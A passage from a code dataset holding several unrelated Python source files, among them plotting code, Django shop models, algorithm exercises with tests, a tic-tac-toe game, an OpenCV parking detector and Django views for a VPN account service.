0]\r\nax.scatter(scores_stp['significance'], scores_stp['reg_mean_errors'])\r\nax.plot(scores_stp['significance'], scores_stp['reg_mean_errors'])\r\nax.plot(scores_stp['significance'], scores_stp['significance'], '--', color='k')\r\nax.set_title('Average daily sold parking hours')\r\nax.set_ylabel('Error rate')\r\n\r\nax = axs[0, 1]\r\nax.scatter(scores_dur['significance'], scores_dur['reg_mean_errors'])\r\nax.plot(scores_dur['significance'], scores_dur['reg_mean_errors'])\r\nax.plot(scores_dur['significance'], scores_dur['significance'], '--', color='k')\r\nax.set_title('Average duration of stay')\r\n\r\nax = axs[1, 0]\r\nax.scatter(scores_entry['significance'], scores_entry['reg_mean_errors'])\r\nax.plot(scores_entry['significance'], scores_entry['reg_mean_errors'])\r\nax.plot(scores_entry['significance'], scores_entry['significance'], '--', color='k')\r\nax.set_title('Average time of entry')\r\nax.set_ylabel('Error rate')\r\n\r\nax = axs[1, 1]\r\nax.scatter(scores_occstp['significance'], scores_occstp['reg_mean_errors'])\r\nax.plot(scores_occstp['significance'], scores_occstp['reg_mean_errors'])\r\nax.plot(scores_occstp['significance'], scores_occstp['significance'], '--', color='k')\r\nax.set_title('Average daytime occupancy')\r\nax.set_xlabel('Significance level εₜ')\r\n\r\nax = axs[2, 0]\r\nax.scatter(scores_rev.index, scores_rev['reg_mean_errors'])\r\nax.plot(scores_rev.index, scores_rev['reg_mean_errors'])\r\nax.plot(scores_rev.index, scores_rev.index, '--', color='k')\r\nax.set_title('Average daily revenue')\r\nax.set_ylabel('Error rate')\r\nax.set_xlabel('Significance level εₜ')\r\n\r\nfig.delaxes(axs[2, 1])\r\nfig.suptitle('Empirical validity per target')\r\n\r\nplt.show()\r\n","repo_name":"mateuszwiza/mtcp","sub_path":"baseline.py","file_name":"baseline.py","file_ext":"py","file_size_in_byte":14194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"21437825111","text":"import uuid\n\nfrom django.core.validators import MinValueValidator, MaxValueValidator\nfrom django.db import models\n\nfrom common.models import UpdatedAndCreated\nfrom common.utils import unique_sku_generator\n\n\nclass DeliveryOptions(UpdatedAndCreated):\n ACTIVE = (\n (True, \"Active\"),\n (False, \"Not Active\"),\n )\n sku = models.IntegerField(\n null=False, blank=True, unique=True, editable=False\n )\n option = models.CharField(max_length=255, null=False, blank=False)\n price = models.DecimalField(\n max_digits=10, decimal_places=2, null=False, default=0\n )\n description = models.CharField(max_length=400, null=False, blank=False)\n active = models.BooleanField(default=False, choices=ACTIVE)\n\n class Meta:\n verbose_name_plural = \"Delivery Options\"\n\n def save(self, *args, **kwargs):\n \"\"\"\n Override the original save method to set a unique sku\n for the delivery option.\n \"\"\"\n if not self.sku:\n self.sku = unique_sku_generator(self, 6)\n super().save(*args, **kwargs)\n\n def __str__(self):\n return self.option\n\n\nclass DiscountCode(models.Model):\n ACTIVE = (\n (True, \"Active\"),\n (False, \"Not Active\"),\n )\n TRUE_FALSE = (\n (True, \"True\"),\n (False, \"False\"),\n )\n id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)\n sku = models.IntegerField(\n null=False, blank=True, unique=True, editable=False\n )\n code = models.CharField(max_length=50, blank=False, unique=True)\n discount = models.PositiveIntegerField(\n blank=False,\n null=False,\n validators=[MinValueValidator(0), MaxValueValidator(100)],\n )\n active = models.BooleanField(default=False, choices=ACTIVE)\n set_expiry = models.BooleanField(default=False, choices=TRUE_FALSE)\n set_quantity = models.BooleanField(default=False, choices=TRUE_FALSE)\n expiry = models.DateField(null=True, blank=True)\n quantity = models.PositiveIntegerField(\n blank=True, null=True, validators=[MinValueValidator(0)]\n )\n created = models.DateTimeField(auto_now_add=True)\n created_by = models.CharField(max_length=100, blank=True)\n\n def save(self, *args, **kwargs):\n \"\"\"\n Override the original save method to set a unique sku\n for the discount code.\n \"\"\"\n if not self.sku:\n self.sku = unique_sku_generator(self, 6)\n super().save(*args, **kwargs)\n\n def __str__(self):\n return self.code\n","repo_name":"Tmuat/handmade-by-ellie","sub_path":"bag/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"16340175580","text":"sentence = input(\"Type text\") #type sentecne\r\nListofStrings = sentence.split() #space\r\n\r\ncaps = []\r\nfor word in ListofStrings:\r\n word = str(word).lower()\r\n caps.append(word)\r\n# .sort this function will put it alphabetical order\r\ncaps = list(set(caps))\r\ncaps.sort()\r\n#printing the sentence and words\r\nprint(\"sentence:\", sentence)\r\nprint(\"Each word is\", f\"{caps}\")\r\nprint(\"Number of words in the sentence = \", f\"{len(caps)}\")","repo_name":"Joseuri17/CS50-Python","sub_path":"Python Programming/Duplicates/removeDuplicateWords.py","file_name":"removeDuplicateWords.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"20094075867","text":"import unittest\r\nimport doctest\r\nfrom typing import Any\r\nfrom chap04_test import Stack\r\n\r\n# %% [markdown]\r\n# # 再帰的アルゴリズム\r\n# %%\r\n\r\n# %% [markdown]\r\n# ## 再帰の基本\r\n\r\n\r\nclass TestFactorial(unittest.TestCase):\r\n def test_3の階乗は6であること(self):\r\n self.assertEqual(factorial(3), 6)\r\n\r\n\r\ndef factorial(n: int) -> int:\r\n \"\"\"\r\n 非負の整数の階乗値を求める\r\n >>> factorial(3)\r\n 6\r\n \"\"\"\r\n if n > 0:\r\n return n * factorial(n - 1)\r\n else:\r\n return 1\r\n\r\n\r\nclass TestGcd(unittest.TestCase):\r\n def test_22と8の最大公約数は2であること(self):\r\n self.assertEqual(gcd(22, 8), 2)\r\n\r\n\r\ndef gcd(x: int, y: int) -> int:\r\n \"\"\"\r\n ユークリッドの互除法を用いて、xとyの最大公約数を求める。\r\n >>> gcd(22, 8)\r\n 2\r\n \"\"\"\r\n if y == 0:\r\n return x\r\n else:\r\n return gcd(y, x % y)\r\n\r\n\r\nclass TestRecur(unittest.TestCase):\r\n def test_実行結果を配列で返すこと(self):\r\n self.assertEqual(recur(4, []), [1, 2, 3, 1, 4, 1, 2])\r\n\r\n def test_末尾再帰を除去した実行結果を配列で返すこと(self):\r\n self.assertEqual(recur2(4, []), [1, 2, 3, 1, 4, 1, 2])\r\n\r\n def test_スタックを用いて末尾再帰を除去した実行結果を配列で返すこと(self):\r\n self.assertEqual(recur3(4, []), [1, 2, 3, 1, 4, 1, 2])\r\n\r\n\r\ndef recur(n: int, result: list) -> list:\r\n \"\"\"真に再帰的な関数\r\n\r\n >>> recur(4, [])\r\n [1, 2, 3, 1, 4, 1, 2]\r\n \"\"\"\r\n if n > 0:\r\n recur(n - 1, result)\r\n result.append(n)\r\n recur(n - 2, result)\r\n\r\n return result\r\n\r\ndef recur2(n: int, result: list) -> list:\r\n \"\"\"末尾再帰を除去した関数\r\n\r\n >>> recur2(4, [])\r\n [1, 2, 3, 1, 4, 1, 2]\r\n \"\"\"\r\n while n > 0:\r\n recur(n - 1, result)\r\n result.append(n)\r\n n = n - 2\r\n\r\n return result\r\n\r\ndef recur3(n: int, result: list) -> list:\r\n \"\"\"スタックを用いて末尾再帰を除去した関数\r\n\r\n >>> recur3(4, [])\r\n [1, 2, 3, 1, 4, 1, 2]\r\n \"\"\"\r\n s = Stack(n)\r\n\r\n while True:\r\n if n > 0:\r\n s.push(n)\r\n n = n - 1\r\n continue\r\n if not s.is_empty():\r\n n = s.pop()\r\n result.append(n)\r\n n = n - 2\r\n continue\r\n break\r\n\r\n return result\r\n\r\n# %% [markdown]\r\n# ## ハノイの塔\r\n\r\n\r\nclass TestMove(unittest.TestCase):\r\n def test_円盤3枚(self):\r\n excepted = [\r\n '円盤[1]を1軸から3軸へ移動',\r\n '円盤[2]を1軸から2軸へ移動',\r\n '円盤[1]を3軸から2軸へ移動',\r\n '円盤[3]を1軸から3軸へ移動',\r\n '円盤[1]を2軸から1軸へ移動',\r\n '円盤[2]を2軸から3軸へ移動',\r\n '円盤[1]を1軸から3軸へ移動'\r\n ]\r\n actual = move(3, 1, 3, [])\r\n self.assertEquals(actual, excepted)\r\n\r\n\r\ndef move(no: int, x: int, y: int, result: list) -> list:\r\n \"\"\"no枚の円盤x軸からy軸へ移動\r\n >>> move(3, 1, 3, [])\r\n ['円盤[1]を1軸から3軸へ移動', '円盤[2]を1軸から2軸へ移動', '円盤[1]を3軸から2軸へ移動', '円盤[3]を1軸から3軸へ移動', '円盤[1]を2軸から1軸へ移動', '円盤[2]を2軸から3軸へ移動', '円盤[1]を1軸から3軸へ移動']\r\n \"\"\"\r\n if no > 1:\r\n move(no - 1, x, 6 - x - y, result)\r\n\r\n result.append(f'円盤[{no}]を{x}軸から{y}軸へ移動')\r\n\r\n if no > 1:\r\n move(no - 1, 6 - x - y, y, result)\r\n\r\n return result\r\n\r\n\r\n# %% [markdown]\r\n# ## 8王妃問題\r\n\r\nclass TestEightQueen(unittest.TestCase):\r\n def test_各列に1個の王妃を配置する組み合わせを再帰的に列挙(self):\r\n eight_queen = EightQueen()\r\n eight_queen.set(0)\r\n self.assertEqual(len(eight_queen.result), 16777216)\r\n\r\n def test_各列に1個の王妃を配置する組み合わせを再帰的に列挙2(self):\r\n eight_queen = EightQueen2()\r\n eight_queen.set(0)\r\n self.assertEqual(len(eight_queen.result), 40320)\r\n\r\n def test_8王妃問題を解くプログラム(self):\r\n eight_queen = EightQueen3()\r\n eight_queen.set(0)\r\n self.assertEqual(len(eight_queen.result), 92)\r\n\r\n\r\nclass EightQueen:\r\n def __init__(self) -> None:\r\n self.result = []\r\n self.__pos = [0] * 8\r\n\r\n def set(self, i:int) -> None:\r\n \"\"\"i列目に王妃を配置\"\"\"\r\n for j in range(8):\r\n self.__pos[i] = j\r\n if i == 7:\r\n self.put()\r\n else:\r\n self.set(i + 1)\r\n\r\n def put(self) -> None:\r\n \"\"\"盤面(各列の王妃の位置)\"\"\"\r\n row = []\r\n for i in range(8):\r\n row.append(self.__pos[i])\r\n self.result.append(row)\r\n\r\n\r\nclass EightQueen2:\r\n def __init__(self) -> None:\r\n self.result = []\r\n self.__pos = [0] * 8\r\n self.__flag = [False] * 8\r\n\r\n def set(self, i: int) -> None:\r\n \"\"\"i列目の適切な位置に王妃を配置\"\"\"\r\n for j in range(8):\r\n if not self.__flag[j]:\r\n self.__pos[i] = j\r\n if i == 7:\r\n self.put()\r\n else:\r\n self.__flag[j] = True\r\n self.set(i + 1)\r\n self.__flag[j] = False\r\n\r\n def put(self) -> None:\r\n \"\"\"盤面(各列の王妃の位置)\"\"\"\r\n row = []\r\n for i in range(8):\r\n row.append(self.__pos[i])\r\n self.result.append(row)\r\n\r\n\r\nclass EightQueen3:\r\n def __init__(self) -> None:\r\n self.result = []\r\n self.__pos = [0] * 8\r\n self.__flag_a = [False] * 8\r\n self.__flag_b = [False] * 15\r\n self.__flag_c = [False] * 15\r\n\r\n def set(self, i: int) -> None:\r\n \"\"\"i列目の適切な位置に王妃を配置\"\"\"\r\n for j in range(8):\r\n if (not self.__flag_a[j]\r\n and not self.__flag_b[i + j]\r\n and not self.__flag_c[i - j + 7]):\r\n self.__pos[i] = j\r\n if i == 7:\r\n self.put()\r\n self.put2()\r\n else:\r\n self.__flag_a[j] = self.__flag_b[i +\r\n j] = self.__flag_c[i - j + 7] = True\r\n self.set(i + 1)\r\n self.__flag_a[j] = self.__flag_b[i +\r\n j] = self.__flag_c[i - j + 7] = False\r\n\r\n def put(self) -> None:\r\n \"\"\"盤面(各列の王妃の位置)\"\"\"\r\n row = []\r\n for i in range(8):\r\n row.append(self.__pos[i])\r\n self.result.append(row)\r\n\r\n def put2(self) -> None:\r\n \"\"\"盤面を□と■で出力\"\"\"\r\n for j in range(8):\r\n for i in range(8):\r\n print('■' if self.__pos[i] == j else '□', end='')\r\n print()\r\n print()\r\n\r\n\r\n\r\ndoctest.testmod(verbose=True)\r\nunittest.main(argv=[''], verbosity=2, exit=False)\r\n","repo_name":"k2works/python-drill","sub_path":"src/chap05.py","file_name":"chap05.py","file_ext":"py","file_size_in_byte":7130,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"15231951923","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[4]:\n# ------------------------------------------------------------------------------------------------------------\n\n# In[25]:\nboard=[\" \",\" \",\" \",\" \",\" \",\" \",\" \",\" \",\" \",\" \"]\ntest_board=[\"X\",\"O\",\"X\",\"O\",\"X\",\"O\",\"X\",\"O\",\"X\"]\n\n\n# In[26]:\n\n\nfrom IPython.display import clear_output\ndef displaying_the_board(board):\n print(board[0] + \" | \" +board[1]+ \" | \" +board[2])\n print(\"------------------\")\n print(board[3] + \" | \" +board[4]+ \" | \"+board[5])\n print(\"------------------\")\n print(board[6] + \" | \" +board[7]+ \" | \"+board[8])\n \n\n\n# In[27]:\n\n\ndisplaying_the_board(board)\n\ndisplaying_the_board(test_board)\n\n\n# In[28]:\n\n\ndef player_input():\n marker=\"\"\n #Ask player to choose X or O\n while marker!=\"X\" and marker!=\"O\":\n marker=input(\"Player 1 , Choose X or O: \").upper()\n if marker==\"X\":\n player1=\"X\"\n player2=\"O\"\n else:\n player1=\"O\"\n player2=\"X\"\n print(f'Player 1 is {player1} and Player 2 is {player2}')\n return player1,player2\n\n \n \n\n\n# In[29]:\n\n\nplayer_input()\n\n\n# In[32]:\n\n\ndef place_marker(board,position,marker):\n board[position]=marker\n\n\n# In[33]:\n\n\nplace_marker(test_board,0,\"X\")\ndisplaying_the_board(test_board)\n\n\n# In[34]:\n\n\ndef win_check(board,mark):\n return (board[0]==board[1]==board[2]==mark or board[3]==board[4]==board[5]==mark or board[6]==board[7]==board[8]==mark or \n board[0]==board[3]==board[6]==mark or board[1]==board[4]==board[7]==mark or board[2]==board[5]==board[8]==mark or\n board[0]==board[4]==board[8]==mark or board[2]==board[4]==board[6]==mark)\n \n \n\n\n# In[35]:\n\n\ndisplaying_the_board(test_board)\nwin_check(test_board,\"X\" or \"O\")\n\n\n# In[36]:\n\n\nimport random\ndef choose_first():\n rand=random.randint(0,1)\n if rand==0:\n return 'Player 2 goes first'\n else:\n return 'Player 1 goes first'\n\n\n# In[37]:\n\n\nchoose_first()\n\n\n# In[38]:\n\n\ndef space_check(board,position):\n return board[position]==\" \"\n\n\n# In[39]:\n\n\ndef full_board_check(board):\n for i in range(0,10):\n if space_check(board,i):\n return False\n return True\n\n\n# In[40]:\n\n\nfull_board_check(board)\n\n\n# In[41]:\n\n\ndef player_choice(board):\n position=10\n while position not in range(0,9) or not space_check(board,position):\n position= int(input(\"Choose a position between 0 and 8 : \"))\n return position\n\n\n# In[44]:\n\n\nplayer_choice(board)\n\n\n# In[46]:\n\n\ndef play_again():\n choice=input(\"Do you want to play again? Yes or No ?\")\n return choice==\"Yes\".lower()\n \n\n\n# In[47]:\n\n\nplay_again()\n\n\n# In[ ]:\n\n\nprint(\"TIC-TAC-TOE\")\nwhile True:\n board=[\" \",\" \",\" \",\" \",\" \",\" \",\" \",\" \",\" \",\" \"]\n player1_marker, player2_marker = player_input()\n turn=choose_first()\n print(f'{turn}')\n play_game = input('Are you ready to play? Enter Y or N.')\n if play_game.lower()==\"y\":\n game_on=True\n else:\n game_on=False\n while game_on:\n if turn == 'Player 1':\n # Player1's turn.\n \n displaying_the_board(board)\n position = player_choice(board)\n \n place_marker(board,position,player1_marker)\n\n if win_check(board,player1_marker):\n displaying_the_board(board)\n print('Congratulations! You have won the game!')\n game_on = False\n else:\n if full_board_check(board):\n displaying_the_board(board)\n print('The game is a draw!')\n break\n else:\n turn = 'Player 2'\n\n else:\n # Player2's turn.\n \n displaying_the_board(board)\n position = player_choice(board)\n place_marker(board,position,player2_marker)\n\n if win_check(board,player2_marker):\n displaying_the_board(board)\n print('Player 2 has won!')\n game_on = False\n else:\n if full_board_check(board):\n displaying_the_board(board)\n print('The game is a draw!')\n break\n else:\n turn = 'Player 1'\n\n if not play_again():\n break\n\n \n \n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"navya09jain/Tic-Tac-Toe","sub_path":"project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":4321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"407988750","text":"import cv2\nimport numpy as np\n\n\nimg = cv2.imread('3.jpg')\n\n\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n\nblur = cv2.GaussianBlur(gray, (5, 5), 0)\n\nedges = cv2.Canny(blur, 50, 150)\n\n\nkernel = cv2.getStructuringElement(cv2.MORPH_RECT, (5, 5))\nclosed = cv2.morphologyEx(edges, cv2.MORPH_CLOSE, kernel)\n\n\ncontours, hierarchy = cv2.findContours(closed, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n\n\nparking_spaces = 0\nfor contour in contours:\n \n area = cv2.contourArea(contour)\n if area > 1000 and area < 10000:\n \n perimeter = cv2.arcLength(contour, True)\n \n approx = cv2.approxPolyDP(contour, 0.02 * perimeter, True)\n \n corners = len(approx)\n if corners == 4:\n \n x, y, w, h = cv2.boundingRect(contour)\n aspect_ratio = float(w) / h\n if aspect_ratio > 0.5 and aspect_ratio < 2:\n \n parking_spaces += 1\n cv2.rectangle(img, (x, y), (x + w, y + h), (0, 255, 0), 2)\n\n\ncv2.imshow('result', img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","repo_name":"plaree/project-junks","sub_path":"deneme_img2.py","file_name":"deneme_img2.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"74938412384","text":"import requests\nimport io\nimport zipfile\nimport hmac\nimport base64\nfrom hashlib import sha256\nfrom urllib.parse import urlencode, parse_qsl\nfrom datetime import timedelta, datetime\n\nfrom django.http import (\n HttpResponse, JsonResponse,\n HttpResponseRedirect,\n HttpResponseNotFound, HttpResponseForbidden\n)\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth import authenticate\nfrom django.contrib.auth.decorators import login_required, user_passes_test\nfrom django.contrib.admin.sites import site\nfrom django.contrib import messages\nfrom django.utils.translation import ugettext as _\nfrom django.utils import timezone\nfrom django.conf import settings as project_settings\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.db.models import Count\nfrom django.contrib import auth\nfrom django.contrib.auth.models import User\nfrom django_countries import countries\nfrom constance import config as site_config\nimport lcoreapi\n\nfrom ccvpn.common import get_client_ip, get_price_float\nfrom payments.models import ACTIVE_BACKENDS\nfrom .forms import SignupForm, ReqEmailForm\nfrom .models import GiftCode, VPNUser\nfrom .core import core_api\nfrom . import core\nfrom . import graphs\nfrom . import openvpn\n\n\ndef get_locations():\n \"\"\" Pretty bad thing that returns get_locations() with translated stuff\n that depends on the request\n \"\"\"\n countries_d = dict(countries)\n locations = core.get_locations()\n for k, v in locations:\n cc = v['country_code'].upper()\n v['country_name'] = countries_d.get(cc, cc)\n return locations\n\n\ndef ca_crt(request):\n return HttpResponse(content=project_settings.OPENVPN_CA,\n content_type='application/x-x509-ca-cert')\n\n\ndef logout(request):\n auth.logout(request)\n return redirect('index')\n\n\ndef signup(request):\n if request.user.is_authenticated():\n return redirect('account:index')\n\n if request.method != 'POST':\n form = SignupForm()\n return render(request, 'ccvpn/signup.html', dict(form=form))\n\n form = SignupForm(request.POST)\n\n if not form.is_valid():\n return render(request, 'ccvpn/signup.html', dict(form=form))\n\n user = User.objects.create_user(form.cleaned_data['username'],\n form.cleaned_data['email'],\n form.cleaned_data['password'])\n user.save()\n\n if core.VPN_AUTH_STORAGE == 'core':\n core.create_user(form.cleaned_data['username'], form.cleaned_data['password'])\n\n try:\n user.vpnuser.referrer = User.objects.get(id=request.session.get('referrer'))\n except User.DoesNotExist:\n pass\n\n user.vpnuser.campaign = request.session.get('campaign')\n\n user.vpnuser.save()\n\n user.backend = 'django.contrib.auth.backends.ModelBackend'\n auth.login(request, user)\n\n return redirect('account:index')\n\n\n@login_required\ndef discourse_login(request):\n sso_secret = project_settings.DISCOURSE_SECRET\n discourse_url = project_settings.DISCOURSE_URL\n\n if project_settings.DISCOURSE_SSO is not True:\n return HttpResponseNotFound()\n\n payload = request.GET.get('sso', '')\n signature = request.GET.get('sig', '')\n\n expected_signature = hmac.new(sso_secret.encode('utf-8'),\n payload.encode('utf-8'),\n sha256).hexdigest()\n\n if signature != expected_signature:\n return HttpResponseNotFound()\n\n if request.method == 'POST' and 'email' in request.POST:\n form = ReqEmailForm(request.POST)\n if not form.is_valid():\n return render(request, 'ccvpn/require_email.html', dict(form=form))\n\n request.user.email = form.cleaned_data['email']\n request.user.save()\n\n if not request.user.email:\n form = ReqEmailForm()\n return render(request, 'ccvpn/require_email.html', dict(form=form))\n\n try:\n payload = base64.b64decode(payload).decode('utf-8')\n payload_data = dict(parse_qsl(payload))\n except (TypeError, ValueError):\n return HttpResponseNotFound()\n\n payload_data.update({\n 'external_id': request.user.id,\n 'username': request.user.username,\n 'email': request.user.email,\n 'require_activation': 'true',\n })\n\n payload = urlencode(payload_data)\n payload = base64.b64encode(payload.encode('utf-8'))\n signature = hmac.new(sso_secret.encode('utf-8'), payload, sha256).hexdigest()\n redirect_query = urlencode(dict(sso=payload, sig=signature))\n redirect_path = '/session/sso_login?' + redirect_query\n\n return HttpResponseRedirect(discourse_url + redirect_path)\n\n\n@login_required\ndef index(request):\n ref_url = project_settings.ROOT_URL + '?ref=' + str(request.user.id)\n\n twitter_url = 'https://twitter.com/intent/tweet?'\n twitter_args = {\n 'text': _(\"Awesome VPN! 3€ per month, with a free 7 days trial!\"),\n 'via': 'CCrypto_VPN',\n 'url': ref_url,\n 'related': 'CCrypto_VPN,CCrypto_org'\n }\n\n class price_fn:\n \"\"\" Clever hack to get the price in templates with {{price.3}} with\n 3 an arbitrary number of months\n \"\"\"\n def __getitem__(self, months):\n n = int(months) * get_price_float()\n c = project_settings.PAYMENTS_CURRENCY[1]\n return '%.2f %s' % (n, c)\n\n context = dict(\n title=_(\"Account\"),\n ref_url=ref_url,\n twitter_link=twitter_url + urlencode(twitter_args),\n subscription=request.user.vpnuser.get_subscription(include_unconfirmed=True),\n backends=sorted(ACTIVE_BACKENDS.values(), key=lambda x: x.backend_id),\n subscr_backends=sorted((b for b in ACTIVE_BACKENDS.values()\n if b.backend_has_recurring),\n key=lambda x: x.backend_id),\n default_backend='paypal',\n recaptcha_site_key=project_settings.RECAPTCHA_SITE_KEY,\n price=price_fn(),\n user_motd=site_config.MOTD_USER,\n )\n return render(request, 'lambdainst/account.html', context)\n\n\ndef captcha_test(grr, request):\n api_url = project_settings.RECAPTCHA_API\n\n if api_url == 'TEST' and grr == 'TEST-TOKEN':\n # FIXME: i'm sorry.\n return True\n\n data = dict(secret=project_settings.RECAPTCHA_SECRET_KEY,\n remoteip=get_client_ip(request),\n response=grr)\n\n try:\n r = requests.post(api_url, data=data)\n r.raise_for_status()\n d = r.json()\n return d.get('success')\n except (requests.ConnectionError, requests.HTTPError, ValueError):\n return False\n\n\n@login_required\ndef trial(request):\n if request.method != 'POST' or not request.user.vpnuser.can_have_trial:\n return redirect('account:index')\n\n grr = request.POST.get('g-recaptcha-response', '')\n if captcha_test(grr, request):\n request.user.vpnuser.give_trial_period()\n request.user.vpnuser.save()\n messages.success(request, _(\"OK!\"))\n else:\n messages.error(request, _(\"Invalid captcha\"))\n\n return redirect('account:index')\n\n\n@login_required\ndef settings(request):\n if request.method != 'POST':\n return render(request, 'lambdainst/settings.html')\n\n pw = request.POST.get('password')\n pw2 = request.POST.get('password2')\n if pw and pw2:\n if pw != pw2:\n messages.error(request, _(\"Passwords do not match\"))\n else:\n request.user.set_password(pw)\n\n if core.VPN_AUTH_STORAGE == 'core':\n core.update_user_password(request.user, pw)\n\n messages.success(request, _(\"OK!\"))\n\n email = request.POST.get('email')\n if email:\n request.user.email = email\n else:\n request.user.email = ''\n\n request.user.save()\n\n return render(request, 'lambdainst/settings.html', dict(title=_(\"Settings\")))\n\n\n@login_required\ndef gift_code(request):\n try:\n code = GiftCode.objects.get(code=request.POST.get('code', '').strip(), available=True)\n except GiftCode.DoesNotExist:\n code = None\n\n if code is None:\n messages.error(request, _(\"Gift code not found or already used.\"))\n elif not code.use_on(request.user):\n messages.error(request, _(\"Gift code only available to free accounts.\"))\n else:\n messages.success(request, _(\"OK!\"))\n\n return redirect('account:index')\n\n\n@login_required\ndef logs(request):\n page_size = 20\n page = int(request.GET.get('page', 0))\n offset = page * page_size\n\n base = core_api.info['current_instance']\n path = '/users/' + request.user.username + '/sessions/'\n try:\n l = core_api.get(base + path, offset=offset, limit=page_size)\n total_count = l['total_count']\n items = l['items']\n except lcoreapi.APINotFoundError:\n total_count = 0\n items = []\n return render(request, 'lambdainst/logs.html', {\n 'sessions': items,\n 'page': page,\n 'prev': page - 1 if page > 0 else None,\n 'next': page + 1 if offset + page_size < total_count else None,\n 'last_page': total_count // page_size,\n 'title': _(\"Logs\"),\n })\n\n\n@login_required\ndef config(request):\n return render(request, 'lambdainst/config.html', dict(\n title=_(\"Config\"),\n config_os=openvpn.CONFIG_OS,\n config_countries=(c for _, c in get_locations()),\n config_protocols=openvpn.PROTOCOLS,\n ))\n\n\n@login_required\ndef config_dl(request):\n allowed_cc = [cc for (cc, _) in get_locations()]\n\n os = request.GET.get('client_os')\n\n common_options = {\n 'username': request.user.username,\n 'protocol': request.GET.get('protocol'),\n 'os': os,\n 'http_proxy': request.GET.get('http_proxy'),\n 'ipv6': 'enable_ipv6' in request.GET,\n }\n\n # Should be validated since it's used in the filename\n # other common options are only put in the config file\n protocol = common_options['protocol']\n if protocol not in ('udp', 'udpl', 'tcp'):\n return HttpResponseNotFound()\n\n location = request.GET.get('gateway')\n\n if location == 'all':\n # Multiple gateways in a zip archive\n\n f = io.BytesIO()\n z = zipfile.ZipFile(f, mode='w')\n\n for gw_name in allowed_cc + ['random']:\n if os == 'chromeos':\n filename = 'ccrypto-%s-%s.onc' % (gw_name, protocol)\n else:\n filename = 'ccrypto-%s-%s.ovpn' % (gw_name, protocol)\n config = openvpn.make_config(gw_name=gw_name, **common_options)\n z.writestr(filename, config.encode('utf-8'))\n\n z.close()\n\n r = HttpResponse(content=f.getvalue(), content_type='application/zip')\n r['Content-Disposition'] = 'attachment; filename=\"%s.zip\"' % filename\n return r\n else:\n # Single gateway\n if location[3:] in allowed_cc:\n gw_name = location[3:]\n else:\n gw_name = 'random'\n if os == 'chromeos':\n filename = 'ccrypto-%s-%s.onc' % (gw_name, protocol)\n else:\n filename = 'ccrypto-%s-%s.ovpn' % (gw_name, protocol)\n\n config = openvpn.make_config(gw_name=gw_name, **common_options)\n\n if 'plain' in request.GET:\n return HttpResponse(content=config, content_type='text/plain')\n else:\n if os == 'chromeos':\n r = HttpResponse(content=config, content_type='application/x-onc')\n else:\n r = HttpResponse(content=config, content_type='application/x-openvpn-profile')\n r['Content-Disposition'] = 'attachment; filename=\"%s\"' % filename\n return r\n\n\n@csrf_exempt\ndef api_auth(request):\n if request.method != 'POST':\n return HttpResponseNotFound()\n\n if core.VPN_AUTH_STORAGE != 'inst':\n return HttpResponseNotFound()\n\n username = request.POST.get('username')\n password = request.POST.get('password')\n secret = request.POST.get('secret')\n\n if secret != core.LCORE_INST_SECRET:\n return HttpResponseForbidden(content=\"Invalid secret\")\n\n user = authenticate(username=username, password=password)\n if not user or not user.is_active:\n return JsonResponse(dict(status='fail', message=\"Invalid credentials\"))\n\n if not user.vpnuser.is_paid:\n return JsonResponse(dict(status='fail', message=\"Not allowed to connect\"))\n\n user.vpnuser.last_vpn_auth = timezone.now()\n user.vpnuser.save()\n\n return JsonResponse(dict(status='ok'))\n\n\ndef api_locations(request):\n def format_loc(cc, l):\n msg = ' [%s]' % l['message'] if l['message'] else ''\n return {\n 'country_name': l['country_name'] + msg,\n 'country_code': cc,\n 'hostname': l['hostname'],\n 'bandwidth': l['bandwidth'],\n 'servers': l['servers'],\n }\n return JsonResponse(dict(locations=[format_loc(cc, l) for cc, l in get_locations()]))\n\n\ndef status(request):\n locations = get_locations()\n\n ctx = {\n 'title': _(\"Status\"),\n 'n_users': VPNUser.objects.filter(expiration__gte=timezone.now()).count(),\n 'n_sess': core.current_active_sessions(),\n 'n_gws': sum(l['servers'] for cc, l in locations),\n 'n_countries': len(set(cc for cc, l in locations)),\n 'total_bw': sum(l['bandwidth'] for cc, l in locations),\n 'locations': locations,\n }\n return render(request, 'lambdainst/status.html', ctx)\n\n\n@user_passes_test(lambda user: user.is_staff)\ndef admin_status(request):\n graph_name = request.GET.get('graph_name')\n graph_period = request.GET.get('period')\n if graph_period not in ('y', 'm'):\n graph_period = 'm'\n if graph_name:\n if graph_name == 'users':\n content = graphs.users_graph(graph_period)\n elif graph_name == 'payments_paid':\n content = graphs.payments_paid_graph(graph_period)\n elif graph_name == 'payments_success':\n content = graphs.payments_success_graph(graph_period)\n else:\n return HttpResponseNotFound()\n return HttpResponse(content=content, content_type='image/svg+xml')\n\n payment_status = ((b, b.get_info()) for b in ACTIVE_BACKENDS.values())\n payment_status = ((b, i) for (b, i) in payment_status if i)\n\n ctx = {\n 'api_status': {k: str(v) for k, v in core_api.info.items()},\n 'payment_backends': sorted(ACTIVE_BACKENDS.values(), key=lambda x: x.backend_id),\n 'payment_status': payment_status,\n }\n ctx.update(site.each_context(request))\n return render(request, 'lambdainst/admin_status.html', ctx)\n\n\n@user_passes_test(lambda user: user.is_staff)\ndef admin_ref(request):\n last_week = datetime.now() - timedelta(days=7)\n last_month = datetime.now() - 